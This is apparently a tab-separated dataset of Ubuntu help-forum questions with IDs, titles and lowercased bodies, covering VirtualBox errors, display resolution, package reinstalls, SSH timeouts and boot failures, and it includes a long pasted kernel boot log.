315830	'vt-x features locked or unavailable in msr ' error while trying to install windows xp in virtualbox	i install the application using the .deb , but i ca n't get a virtual machine to boot . how to install it correctly from the beginning ? opening my newly-created xp machine yields this message : failed to open a session for the virtual machine windows ******* ****s. vt-x features locked or unavailable in msr . ( verr_vmx_msr_locked_or_disabled ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 }
315831	what is the purpose of the 00000000000000000000000000000000.png folder in ~/.thumbnails ?	i see ~/.thumbnails/large/00000000000000000000000000000000.png/ and ~/.thumbnails/normal/00000000000000000000000000000000.png/ in lubuntu 13.04 . both folders have been empty whenever i looked . so what is their purpose ? or , under what conditions would these folders be populated ? here 's a screenshot from a video showing these folders ( within the red rectangle ) :
315840	is it possible to change ubuntu skin color ?	can we change the ubuntu skin color to any other colors like silver . what i mean to say is the default ubuntu color is magento ( one kind of pink color ) , i want to change the ubuntu skin color to any other colors . is this option is available in ubuntu ?
315845	ubuntu resolution changed to 1024 x 768	today when i start up my laptop the resolution have dropped to 1024 x 768 . my native resolution is 1280 x 800 . i tried searching for solution but it does n't work . its quite hard to use it sometimes . i 'm using acer aspire 4930 with mobile intel速 4 series express chipset family this is what i get when i do ddcprobe on terminal root @ acer-aspire-4930 : /home/acer_aspire_4930 # ddcprobe vbe : vesa 3.0 detected . oem : intel ( r ) cantiga graphics chip accelerated vga bios vendor : intel corporation product : intel ( r ) cantiga graphics controller hardware version 0.0 memory : 65472kb mode : 1280x1024x256 mode : 1280x1024x64k mode : 1280x1024x16m mode : 1024x768x256 mode : 1024x768x64k mode : 1024x768x16m mode : 640x480x16m mode : 800x600x64k mode : 800x600x16m mode : 640x480x256 mode : 800x600x256 mode : 640x480x64k edid : edid : 1 3 id : 4444 eisa : auo4444 serial : 00000000 manufacture : 1 2006 input : analog signal . screensize : 30 19 gamma : 2.200000 dpms : rgb , no active off , no suspend , no standby dtiming : 1280x800 @ 60 monitorid : auo monitorid : b141ew04 v4 my xorg.0.log http : //pastebin.com/qhcmnp79
315846	can not reinstall adobe reader	i accidentally deleted the files under /opt/ which also included the directory adobe where the reader was installed . now i am trying to reinstall it by using the the command sudo apt-get install acroread in this after a few lines i get the following error amit @ localhost : ~ $ sudo apt-get install aroread [ sudo ] password for amit : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package aroread amit @ localhost : ~ $ sudo apt-get install acroread reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : nspluginviewer : i386 nspluginwrapper the following new packages will be installed : acroread nspluginviewer : i386 nspluginwrapper 0 upgraded , 3 newly installed , 0 to remove and 6 not upgraded . need to get 0 b/218 kb of archives . after this operation , 649 kb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package nspluginviewer : i386 . ( reading database ... 173632 files and directories currently installed . ) unpacking nspluginviewer : i386 ( from ... /nspluginviewer_1.4.4-0ubuntu4_i386.deb ) ... selecting previously unselected package nspluginwrapper . unpacking nspluginwrapper ( from ... /nspluginwrapper_1.4.4-0ubuntu4_amd64.deb ) ... selecting previously unselected package acroread . unpacking acroread ( from ... /acroread_9.5.5-1precise1_amd64.deb ) ... processing triggers for man-db ... setting up nspluginviewer : i386 ( 1.4.4-0ubuntu4 ) ... setting up nspluginwrapper ( 1.4.4-0ubuntu4 ) ... plugin dirs : nspluginwrapper : no appropriate viewer found for /usr/lib/flashplugin-installer/libflashplayer.so auto-update plugins from /usr/lib/mozilla/plugins looking for plugins in /usr/lib/mozilla/plugins auto-update plugins from /usr/lib/firefox/plugins looking for plugins in /usr/lib/firefox/plugins auto-update plugins from /root/.mozilla/plugins looking for plugins in /root/.mozilla/plugins setting up acroread ( 9.5.5-1precise1 ) ... no lsb modules are available . nspluginwrapper : /opt/adobe/reader9/browser/intellinux/nppdf.so is not a valid npapi plugin no lsb modules are available . nspluginwrapper : /opt/adobe/reader9/browser/intellinux/nppdf.so is not a valid npapi plugin i am not sure what it means by lsb modules .
315852	connection to ssh server times out	i have ssh configured for my system . it was working perfectly but now i 'm able to ssh or sc to other systems but other systems are not able to ssh or scp to my system it shows connection timed out error . please help .
315854	how can i create a shared partition for windows and ubuntu in a pen drive ?	i installed ubuntu 13.04 in a 16 gb kingston pen drive ( not the `` live '' , the `` full '' ) using the following partitions : 8 gb ext 4 for `` / '' ; 2 gb for swap ; 6 gb fat 32 free to use just like a pen drive . i can access the 6 gb partition in ubuntu , but when i try to access in windows , it tells me that the pen drive is not formated and asks if i would like to do it . using gparted i recreated the 6 gb partition like ntfs , but i still ca n't acess it via windows . that 's it : i just want a shared partition which i can access via both windows and ubuntu in a pen drive .
315857	vim overwrite instead of edit	i am currently running the following two commands . \rm myfile vim myfile then , i , to enter insert mode , and ctrl-shift-v to paste basically i have text on my clipboard that i would like to copy and overwrite my current file . can this be done with less work ?
315859	where can i get the iso file needed for installing uui ?	to install the universal usb installer ( uui ) i need to have an iso file . where can i get it ( from ) ?
315861	ca n't single boot ubuntu 13.04 64 bit	i 'm new to ubuntu , i bought an asus a45vs laptop recently pre-installed with windows 8 , but i have already uninstalled it and wipef the whole hdd . i plan to install ubuntu 13.04 64 bit on it . i have tried several times to install and uninstall ubuntu again and again with boot-able usb , but it still fail to boot . all the installation process go fine , after rebooting my laptop , it just stick to the purple screen . then i boot it with usb again , tried boot-repair , tried make an efi partition , still the same . i have searched on the web , and all of them was about dual booting with windows 7 or windows 8 , i do n't wish to do dual booting as i wish to have single os which is ubuntu on this laptop . please help , thanks in advance .
315862	ca n't log in to minecraft ?	i 'm not sure if this is the right place , but i ca n't log in to my minecraft ! ! i 'm entering my user details and my correct password and using my correct password it thinks i 'm not using the correct password !
315865	installed older software from software centre . newer version available elsewhere . how to update ?	i 'm new to ubuntu , i just installed 13.04 on a dedicated machine . i want to update to the most recent versions of scientific software namely bowtie , tophat and samtools but i ca n't figure out how since the newer versions are not available from the software centre . these software are command line only by the way . i 'll take bowtie as an example . i installed it from the ubuntu software centre but it is an old version . i therefore downloaded the latest version from the developer 's website and unzipped the pre-compiled package in my home directory . software centre installed the old version in /usr/bin/ and some files at other locations like /usr/share/doc/ and /usr/share/man/man1/ . my understanding is that having the binary in /usr/bin/ makes it available to all users and allows calling it from the command line without having to type the complete path . so , to update the software , do i overwrite the binary in usr/bin/ and the other files elsewhere with the newer versions ? that seems very awkward to me . i suspect there must be some linux command to achieve this goal but i ca n't find it . thank you all for your help .
315868	keyboard shortcut added to lubuntu-rc.xml is not executed on keypress	i wanted to add a custom keyboard shortcut to control mplayer . mplayer config file is set up properly . ~/.config/openbox/lubuntu-rc.xml : < keybind key= '' xf86audioplay '' > < action name= '' execute '' > < command > echo `` pause '' > /home/username/.mplayer/pipe < /command > < /action > < /keybind > pressing the corresponding key has no effect . executing the command itself ( echo `` pause '' > /home/username/.mplayer/pipe in terminal ) works as expected . is there any way to check if the file is parsed and loaded correctly ? please help . thanks .
315876	ubuntu 12.04 running very slowly on vmware with w7 host	i am using a win7 host and ubuntu 12.04 on vmware . i have set the guest ram to almost 3000mb for ubuntu and the win7 host machine has 8gb ram . ubuntu 12.04 is running very slowly on this situation . does anyone have any ideas , why ubuntu is running so slowly , or what i can try to make it faster ? thanks in advance
315877	how can i find out how often a program has started in ubuntu ?	how can i find how often a program ( like firefox , teeworlds , thunderbird , etc . ) has launched ? i 'm a java programmer , so solutions that must be implemented programmatically are acceptable , and preferred .
315878	why ca n't ubuntu find any hard disks or volumes during installation ?	i decided to dual boot windows 7 and ubuntu 13.04 on my computer . but when i try to install ubuntu 13.04 , my installation says i do n't have atleast 5.3 gb disk space . in `` try ubuntu '' , i checked disks utility , system monitor and gparted , none of them list my hard disks ( i have 2 hard disks , 1 is 80gb , the other is 500 gb , both are mostly empty and ide ) . my windows 7 works , and detects all the hard disks ( so this may not be a h/w problem ) i have tried a few ways to resolve this , but have failed . note : i have checked this website and there are a few questions exactly like mine , but none have been adequately answered so as to solve my problem . here are some terminal results sudo dmesg - ( this thing is long ) [ 0.128378 ] acpi : pci interrupt routing table [ \_sb_.pci0.pex0._prt ] [ 0.128434 ] acpi : pci interrupt routing table [ \_sb_.pci0.pex1._prt ] [ 0.128484 ] acpi : pci interrupt routing table [ \_sb_.pci0.pex2._prt ] [ 0.128533 ] acpi : pci interrupt routing table [ \_sb_.pci0.pex3._prt ] [ 0.128581 ] acpi : pci interrupt routing table [ \_sb_.pci0.hub0._prt ] [ 0.128800 ] pci0000:00 : acpi _osc support notification failed , disabling pcie aspm [ 0.128803 ] pci0000:00 : unable to request _osc control ( _osc support mask : 0x08 ) [ 0.130120 ] acpi : pci interrupt link [ lnka ] ( irqs 3 4 5 7 9 *10 11 12 14 15 ) [ 0.130191 ] acpi : pci interrupt link [ lnkb ] ( irqs 3 4 5 7 9 10 *11 12 14 15 ) [ 0.130260 ] acpi : pci interrupt link [ lnkc ] ( irqs 3 4 5 7 *9 10 11 12 14 15 ) [ 0.130328 ] acpi : pci interrupt link [ lnkd ] ( irqs 3 4 5 7 9 10 11 12 14 *15 ) [ 0.130396 ] acpi : pci interrupt link [ lnke ] ( irqs 3 4 5 7 9 10 11 12 14 15 ) *0 , disabled . [ 0.130466 ] acpi : pci interrupt link [ lnkf ] ( irqs 3 4 5 7 9 10 11 12 14 15 ) *0 , disabled . [ 0.130536 ] acpi : pci interrupt link [ lnk0 ] ( irqs 3 4 5 7 9 10 11 12 14 15 ) *0 , disabled . [ 0.130606 ] acpi : pci interrupt link [ lnk1 ] ( irqs 3 4 *5 7 9 10 11 12 14 15 ) [ 0.132020 ] vgaarb : device added : pci:0000:00:02.0 , decodes=io+mem , owns=io+mem , locks=none [ 0.132028 ] vgaarb : loaded [ 0.132030 ] vgaarb : bridge control possible 0000:00:02.0 [ 0.132369 ] scsi subsystem initialized [ 0.132373 ] acpi : bus type scsi registered [ 0.132388 ] libata version 3.00 loaded . [ 0.132388 ] acpi : bus type usb registered [ 0.132388 ] usbcore : registered new interface driver usbfs [ 0.132388 ] usbcore : registered new interface driver hub [ 0.132388 ] usbcore : registered new device driver usb [ 0.132388 ] pci : using acpi for irq routing [ 0.141956 ] pci : pci_cache_line_size set to 64 bytes [ 0.142037 ] e820 : reserve ram buffer [ mem 0x0009f400-0x0009ffff ] [ 0.142040 ] e820 : reserve ram buffer [ mem 0x5f590000-0x5fffffff ] [ 0.142182 ] netlabel : initializing [ 0.142185 ] netlabel : domain hash size = 128 [ 0.142187 ] netlabel : protocols = unlabeled cipsov4 [ 0.142202 ] netlabel : unlabeled traffic allowed by default [ 0.142222 ] hpet : 3 timers in total , 0 timers will be used for per-cpu timer [ 0.142222 ] hpet0 : at mmio 0xfed00000 , irqs 2 , 8 , 0 [ 0.142222 ] hpet0 : 3 comparators , 64-bit 14.318180 mhz counter [ 0.144021 ] switching to clocksource hpet [ 0.158967 ] apparmor : apparmor filesystem enabled [ 0.159020 ] pnp : pnp acpi init [ 0.159047 ] acpi : bus type pnp registered [ 0.159308 ] system 00:00 : [ io 0x04d0-0x04d1 ] has been reserved [ 0.159315 ] system 00:00 : [ io 0x0800-0x087f ] has been reserved [ 0.159321 ] system 00:00 : [ io 0x0880-0x088f ] has been reserved [ 0.159329 ] system 00:00 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.159355 ] pnp 00:01 : [ dma 4 ] [ 0.159402 ] pnp 00:01 : plug and play acpi device , ids pnp0200 ( active ) [ 0.159566 ] pnp 00:02 : plug and play acpi device , ids pnp0103 ( active ) [ 0.159653 ] pnp 00:03 : plug and play acpi device , ids pnp0b00 ( active ) [ 0.159706 ] pnp 00:04 : plug and play acpi device , ids pnp0800 ( active ) [ 0.159770 ] pnp 00:05 : plug and play acpi device , ids pnp0c04 ( active ) [ 0.160151 ] pnp 00:06 : plug and play acpi device , ids pnp0501 ( active ) [ 0.160512 ] pnp 00:07 : plug and play acpi device , ids pnp0501 ( active ) [ 0.161028 ] pnp 00:08 : plug and play acpi device , ids pnp0400 ( active ) [ 0.161229 ] pnp 00:09 : plug and play acpi device , ids pnp0f13 ( active ) [ 0.161325 ] pnp 00:0a : plug and play acpi device , ids pnp0303 pnp030b ( active ) [ 0.161445 ] system 00:0b : [ io 0x0400-0x04bf ] has been reserved [ 0.161453 ] system 00:0b : plug and play acpi device , ids pnp0c02 ( active ) [ 0.161526 ] pnp 00:0c : plug and play acpi device , ids int0800 ( active ) [ 0.161947 ] system 00:0d : [ mem 0xe0000000-0xefffffff ] has been reserved [ 0.161955 ] system 00:0d : plug and play acpi device , ids pnp0c02 ( active ) [ 0.162178 ] system 00:0e : [ mem 0x000f0000-0x000fffff ] could not be reserved [ 0.162185 ] system 00:0e : [ mem 0x5f600000-0x5f6fffff ] has been reserved [ 0.162191 ] system 00:0e : [ mem 0xfed00000-0xfed000ff ] has been reserved [ 0.162197 ] system 00:0e : [ mem 0x5f590000-0x5f5fffff ] could not be reserved [ 0.162202 ] system 00:0e : [ mem 0x00000000-0x0009ffff ] could not be reserved [ 0.162208 ] system 00:0e : [ mem 0x00100000-0x5f58ffff ] could not be reserved [ 0.162214 ] system 00:0e : [ mem 0xfec00000-0xfec00fff ] could not be reserved [ 0.162220 ] system 00:0e : [ mem 0xfed13000-0xfed1dfff ] has been reserved [ 0.162226 ] system 00:0e : [ mem 0xfed20000-0xfed8ffff ] has been reserved [ 0.162232 ] system 00:0e : [ mem 0xfee00000-0xfee00fff ] has been reserved [ 0.162237 ] system 00:0e : [ mem 0xffb00000-0xffb7ffff ] has been reserved [ 0.162243 ] system 00:0e : [ mem 0xfff00000-0xffffffff ] has been reserved [ 0.162249 ] system 00:0e : [ mem 0x000e0000-0x000effff ] has been reserved [ 0.162256 ] system 00:0e : plug and play acpi device , ids pnp0c01 ( active ) [ 0.162269 ] pnp : pnp acpi : found 15 devices [ 0.162272 ] acpi : acpi bus type pnp unregistered [ 0.162279 ] pnpbios : disabled by acpi pnp [ 0.200273 ] pci 0000:00:1c.0 : pci bridge to [ bus 01 ] [ 0.200280 ] pci 0000:00:1c.0 : bridge window [ io 0xb000-0xbfff ] [ 0.200288 ] pci 0000:00:1c.0 : bridge window [ mem 0xfd400000-0xfd4fffff ] [ 0.200294 ] pci 0000:00:1c.0 : bridge window [ mem 0xfde00000-0xfdefffff 64bit pref ] [ 0.200302 ] pci 0000:00:1c.1 : pci bridge to [ bus 02 ] [ 0.200307 ] pci 0000:00:1c.1 : bridge window [ io 0xa000-0xafff ] [ 0.200313 ] pci 0000:00:1c.1 : bridge window [ mem 0xfdd00000-0xfddfffff ] [ 0.200319 ] pci 0000:00:1c.1 : bridge window [ mem 0xfdc00000-0xfdcfffff 64bit pref ] [ 0.200327 ] pci 0000:00:1c.2 : pci bridge to [ bus 03 ] [ 0.200332 ] pci 0000:00:1c.2 : bridge window [ io 0xe000-0xefff ] [ 0.200338 ] pci 0000:00:1c.2 : bridge window [ mem 0xfdb00000-0xfdbfffff ] [ 0.200344 ] pci 0000:00:1c.2 : bridge window [ mem 0xfda00000-0xfdafffff 64bit pref ] [ 0.200352 ] pci 0000:00:1c.3 : pci bridge to [ bus 04 ] [ 0.200357 ] pci 0000:00:1c.3 : bridge window [ io 0xd000-0xdfff ] [ 0.200363 ] pci 0000:00:1c.3 : bridge window [ mem 0xfd900000-0xfd9fffff ] [ 0.200369 ] pci 0000:00:1c.3 : bridge window [ mem 0xfd800000-0xfd8fffff 64bit pref ] [ 0.200377 ] pci 0000:00:1e.0 : pci bridge to [ bus 05 ] [ 0.200381 ] pci 0000:00:1e.0 : bridge window [ io 0xc000-0xcfff ] [ 0.200388 ] pci 0000:00:1e.0 : bridge window [ mem 0xfd600000-0xfd6fffff ] [ 0.200394 ] pci 0000:00:1e.0 : bridge window [ mem 0xfd500000-0xfd5fffff 64bit pref ] [ 0.200455 ] pci 0000:00:1e.0 : setting latency timer to 64 [ 0.200461 ] pci_bus 0000:00 : resource 4 [ io 0x0000-0x0cf7 ] [ 0.200464 ] pci_bus 0000:00 : resource 5 [ io 0x0d00-0xffff ] [ 0.200468 ] pci_bus 0000:00 : resource 6 [ mem 0x000a0000-0x000bffff ] [ 0.200471 ] pci_bus 0000:00 : resource 7 [ mem 0x000c0000-0x000dffff ] [ 0.200475 ] pci_bus 0000:00 : resource 8 [ mem 0x5f600000-0xfebfffff ] [ 0.200479 ] pci_bus 0000:01 : resource 0 [ io 0xb000-0xbfff ] [ 0.200482 ] pci_bus 0000:01 : resource 1 [ mem 0xfd400000-0xfd4fffff ] [ 0.200486 ] pci_bus 0000:01 : resource 2 [ mem 0xfde00000-0xfdefffff 64bit pref ] [ 0.200490 ] pci_bus 0000:02 : resource 0 [ io 0xa000-0xafff ] [ 0.200493 ] pci_bus 0000:02 : resource 1 [ mem 0xfdd00000-0xfddfffff ] [ 0.200497 ] pci_bus 0000:02 : resource 2 [ mem 0xfdc00000-0xfdcfffff 64bit pref ] [ 0.200501 ] pci_bus 0000:03 : resource 0 [ io 0xe000-0xefff ] [ 0.200504 ] pci_bus 0000:03 : resource 1 [ mem 0xfdb00000-0xfdbfffff ] [ 0.200508 ] pci_bus 0000:03 : resource 2 [ mem 0xfda00000-0xfdafffff 64bit pref ] [ 0.200511 ] pci_bus 0000:04 : resource 0 [ io 0xd000-0xdfff ] [ 0.200515 ] pci_bus 0000:04 : resource 1 [ mem 0xfd900000-0xfd9fffff ] [ 0.200519 ] pci_bus 0000:04 : resource 2 [ mem 0xfd800000-0xfd8fffff 64bit pref ] [ 0.200522 ] pci_bus 0000:05 : resource 0 [ io 0xc000-0xcfff ] [ 0.200526 ] pci_bus 0000:05 : resource 1 [ mem 0xfd600000-0xfd6fffff ] [ 0.200529 ] pci_bus 0000:05 : resource 2 [ mem 0xfd500000-0xfd5fffff 64bit pref ] [ 0.200533 ] pci_bus 0000:05 : resource 4 [ io 0x0000-0x0cf7 ] [ 0.200536 ] pci_bus 0000:05 : resource 5 [ io 0x0d00-0xffff ] [ 0.200540 ] pci_bus 0000:05 : resource 6 [ mem 0x000a0000-0x000bffff ] [ 0.200543 ] pci_bus 0000:05 : resource 7 [ mem 0x000c0000-0x000dffff ] [ 0.200547 ] pci_bus 0000:05 : resource 8 [ mem 0x5f600000-0xfebfffff ] [ 0.200597 ] net : registered protocol family 2 [ 0.200876 ] tcp established hash table entries : 8192 ( order : 4 , 65536 bytes ) [ 0.200920 ] tcp bind hash table entries : 8192 ( order : 4 , 65536 bytes ) [ 0.200960 ] tcp : hash tables configured ( established 8192 bind 8192 ) [ 0.200996 ] tcp : reno registered [ 0.201001 ] udp hash table entries : 512 ( order : 2 , 16384 bytes ) [ 0.201016 ] udp-lite hash table entries : 512 ( order : 2 , 16384 bytes ) [ 0.201116 ] net : registered protocol family 1 [ 0.201140 ] pci 0000:00:02.0 : boot video device [ 0.201325 ] pci : cls 32 bytes , default 64 [ 0.201398 ] trying to unpack rootfs image as initramfs ... [ 10.692661 ] freeing initrd memory : 21568k freed [ 10.706208 ] initialise module verification [ 10.706286 ] audit : initializing netlink socket ( disabled ) [ 10.706307 ] type=2000 audit ( 1372874756.700:1 ) : initialized [ 10.738544 ] bounce pool size : 64 pages [ 10.738562 ] hugetlb registered 2 mb page size , pre-allocated 0 pages [ 10.740772 ] vfs : disk quotas dquot_6.5.2 [ 10.740849 ] dquot-cache hash table entries : 1024 ( order 0 , 4096 bytes ) [ 10.741673 ] fuse init ( api version 7.20 ) [ 10.741794 ] msgmni has been set to 1729 [ 10.742311 ] key type asymmetric registered [ 10.742315 ] asymmetric key parser 'x509 ' registered [ 10.742373 ] block layer scsi generic ( bsg ) driver version 0.4 loaded ( major 252 ) [ 10.742409 ] io scheduler noop registered [ 10.742413 ] io scheduler deadline registered ( default ) [ 10.742425 ] io scheduler cfq registered [ 10.742624 ] pcieport 0000:00:1c.0 : irq 40 for msi/msi-x [ 10.742743 ] pcieport 0000:00:1c.1 : irq 41 for msi/msi-x [ 10.742857 ] pcieport 0000:00:1c.2 : irq 42 for msi/msi-x [ 10.742970 ] pcieport 0000:00:1c.3 : irq 43 for msi/msi-x [ 10.743069 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 10.743097 ] pciehp : pci express hot plug controller driver version : 0.4 [ 10.743206 ] intel_idle : does not run on family 6 model 15 [ 10.743300 ] input : power button as /devices/lnxsystm:00/lnxsybus:00/pnp0c0c:00/input/input0 [ 10.743308 ] acpi : power button [ pwrb ] [ 10.743379 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 [ 10.743384 ] acpi : power button [ pwrf ] [ 10.743505 ] acpi : requesting acpi_cpufreq [ 10.747494 ] ghes : hest is not enabled ! [ 10.747526 ] isapnp : scanning for pnp cards ... [ 10.752074 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 10.772550 ] 00:06 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 10.793060 ] 00:07 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 10.795333 ] linux agpgart interface v0.103 [ 10.795500 ] agpgart-intel 0000:00:00.0 : intel g33 chipset [ 10.795578 ] agpgart-intel 0000:00:00.0 : detected gtt size : 524288k total , 262144k mappable [ 10.796022 ] agpgart-intel 0000:00:00.0 : detected 8192k stolen memory [ 10.796189 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000 [ 10.798495 ] brd : module loaded [ 10.799764 ] loop : module loaded [ 10.799986 ] ata_piix 0000:00:1f.1 : version 2.13 [ 10.800080 ] ata_piix 0000:00:1f.1 : setting latency timer to 64 [ 10.800534 ] scsi0 : ata_piix [ 10.801120 ] scsi1 : ata_piix [ 10.801441 ] ata1 : pata max udma/100 cmd 0x1f0 ctl 0x3f6 bmdma 0xfa00 irq 14 [ 10.801447 ] ata2 : pata max udma/100 cmd 0x170 ctl 0x376 bmdma 0xfa08 irq 15 [ 10.801480 ] ata_piix 0000:00:1f.2 : map [ [ 10.801483 ] p0 p2 p1 p3 ] [ 10.801535 ] ata_piix 0000:00:1f.2 : setting latency timer to 64 [ 10.801929 ] scsi2 : ata_piix [ 10.802321 ] scsi3 : ata_piix [ 10.802661 ] ata3 : sata max udma/133 cmd 0xf900 ctl 0xf800 bmdma 0xf500 irq 19 [ 10.802666 ] ata4 : sata max udma/133 cmd 0xf700 ctl 0xf600 bmdma 0xf508 irq 19 [ 10.803203 ] libphy : fixed mdio bus : probed [ 10.803312 ] tun : universal tun/tap device driver , 1.6 [ 10.803315 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 10.803383 ] ppp generic driver version 2.4.2 [ 10.803440 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 10.803443 ] ehci-pci : ehci pci platform driver [ 10.803482 ] ehci-pci 0000:00:1d.7 : setting latency timer to 64 [ 10.803488 ] ehci-pci 0000:00:1d.7 : ehci host controller [ 10.803497 ] ehci-pci 0000:00:1d.7 : new usb bus registered , assigned bus number 1 [ 10.803514 ] ehci-pci 0000:00:1d.7 : debug port 1 [ 10.807423 ] ehci-pci 0000:00:1d.7 : cache line size of 32 is not supported [ 10.807450 ] ehci-pci 0000:00:1d.7 : irq 23 , io mem 0xfdfff000 [ 10.807696 ] ata2 : port disabled -- ignoring [ 10.816024 ] ehci-pci 0000:00:1d.7 : usb 2.0 started , ehci 1.00 [ 10.816066 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 10.816072 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 10.816077 ] usb usb1 : product : ehci host controller [ 10.816082 ] usb usb1 : manufacturer : linux 3.8.0-19-generic ehci_hcd [ 10.816087 ] usb usb1 : serialnumber : 0000:00:1d.7 [ 10.816277 ] hub 1-0:1.0 : usb hub found [ 10.816289 ] hub 1-0:1.0 : 8 ports detected [ 10.816563 ] ehci-platform : ehci generic platform driver [ 10.816582 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 10.816621 ] uhci_hcd : usb universal host controller interface driver [ 10.816661 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 10.816667 ] uhci_hcd 0000:00:1d.0 : uhci host controller [ 10.816677 ] uhci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 10.816709 ] uhci_hcd 0000:00:1d.0 : irq 23 , io base 0x0000fe00 [ 10.816758 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0001 [ 10.816764 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 10.816769 ] usb usb2 : product : uhci host controller [ 10.816773 ] usb usb2 : manufacturer : linux 3.8.0-19-generic uhci_hcd [ 10.816778 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 10.816943 ] hub 2-0:1.0 : usb hub found [ 10.816952 ] hub 2-0:1.0 : 2 ports detected [ 10.817089 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 [ 10.817096 ] uhci_hcd 0000:00:1d.1 : uhci host controller [ 10.817105 ] uhci_hcd 0000:00:1d.1 : new usb bus registered , assigned bus number 3 [ 10.817138 ] uhci_hcd 0000:00:1d.1 : irq 19 , io base 0x0000fd00 [ 10.817186 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0001 [ 10.817191 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 10.817196 ] usb usb3 : product : uhci host controller [ 10.817201 ] usb usb3 : manufacturer : linux 3.8.0-19-generic uhci_hcd [ 10.817206 ] usb usb3 : serialnumber : 0000:00:1d.1 [ 10.817348 ] hub 3-0:1.0 : usb hub found [ 10.817354 ] hub 3-0:1.0 : 2 ports detected [ 10.817496 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 [ 10.817502 ] uhci_hcd 0000:00:1d.2 : uhci host controller [ 10.817512 ] uhci_hcd 0000:00:1d.2 : new usb bus registered , assigned bus number 4 [ 10.817563 ] uhci_hcd 0000:00:1d.2 : irq 18 , io base 0x0000fc00 [ 10.817611 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0001 [ 10.817617 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 10.817622 ] usb usb4 : product : uhci host controller [ 10.817626 ] usb usb4 : manufacturer : linux 3.8.0-19-generic uhci_hcd [ 10.817631 ] usb usb4 : serialnumber : 0000:00:1d.2 [ 10.817801 ] hub 4-0:1.0 : usb hub found [ 10.817810 ] hub 4-0:1.0 : 2 ports detected [ 10.817943 ] uhci_hcd 0000:00:1d.3 : setting latency timer to 64 [ 10.817950 ] uhci_hcd 0000:00:1d.3 : uhci host controller [ 10.817959 ] uhci_hcd 0000:00:1d.3 : new usb bus registered , assigned bus number 5 [ 10.818004 ] uhci_hcd 0000:00:1d.3 : irq 16 , io base 0x0000fb00 [ 10.818055 ] usb usb5 : new usb device found , idvendor=1d6b , idproduct=0001 [ 10.818060 ] usb usb5 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 10.818065 ] usb usb5 : product : uhci host controller [ 10.818070 ] usb usb5 : manufacturer : linux 3.8.0-19-generic uhci_hcd [ 10.818075 ] usb usb5 : serialnumber : 0000:00:1d.3 [ 10.818240 ] hub 5-0:1.0 : usb hub found [ 10.818247 ] hub 5-0:1.0 : 2 ports detected [ 10.818510 ] i8042 : pnp : ps/2 controller [ pnp0303 : ps2k , pnp0f13 : ps2m ] at 0x60,0x64 irq 1,12 [ 10.821116 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 10.821128 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 10.821319 ] mousedev : ps/2 mouse device common for all mice [ 10.821469 ] rtc_cmos 00:03 : rtc can wake from s4 [ 10.821599 ] rtc_cmos 00:03 : rtc core : registered rtc_cmos as rtc0 [ 10.821628 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 10.821774 ] device-mapper : uevent : version 1.0.3 [ 10.821859 ] device-mapper : ioctl : 4.23.1-ioctl ( 2012-12-18 ) initialised : dm-devel @ redhat.com [ 10.821886 ] eisa : probing bus 0 at eisa.0 [ 10.821890 ] eisa : can not allocate resource for mainboard [ 10.821893 ] can not allocate resource for eisa slot 1 [ 10.821896 ] can not allocate resource for eisa slot 2 [ 10.821898 ] can not allocate resource for eisa slot 3 [ 10.821901 ] can not allocate resource for eisa slot 4 [ 10.821903 ] can not allocate resource for eisa slot 5 [ 10.821906 ] can not allocate resource for eisa slot 6 [ 10.821908 ] can not allocate resource for eisa slot 7 [ 10.821911 ] can not allocate resource for eisa slot 8 [ 10.821913 ] eisa : detected 0 cards . [ 10.821926 ] cpufreq-nforce2 : no nforce2 chipset . [ 10.821929 ] cpuidle : using governor ladder [ 10.821931 ] cpuidle : using governor menu [ 10.821938 ] ledtrig-cpu : registered to indicate activity on cpus [ 10.821940 ] efi variables facility v0.08 2004-may-17 [ 10.822172 ] ashmem : initialized [ 10.822399 ] tcp : cubic registered [ 10.822598 ] net : registered protocol family 10 [ 10.822955 ] net : registered protocol family 17 [ 10.822972 ] key type dns_resolver registered [ 10.823301 ] using ipi no-shortcut mode [ 10.823433 ] loading module verification certificates [ 10.831008 ] modsign : loaded cert 'magrathea : glacier signing key : fceb9fd088cf158e29d83343e1c98bf8ab23d94a' [ 10.831031 ] registered taskstats version 1 [ 10.835051 ] key type trusted registered [ 10.839070 ] key type encrypted registered [ 10.843365 ] rtc_cmos 00:03 : setting system clock to 2013-07-03 18:05:57 utc ( 1372874757 ) [ 10.843830 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 10.843834 ] edd information not available . [ 10.849869 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input2 [ 10.984399 ] ata1.00 : atapi : hl-dt-stdvd-ram gh22np20 , 1.03 , max udma/66 [ 10.984423 ] 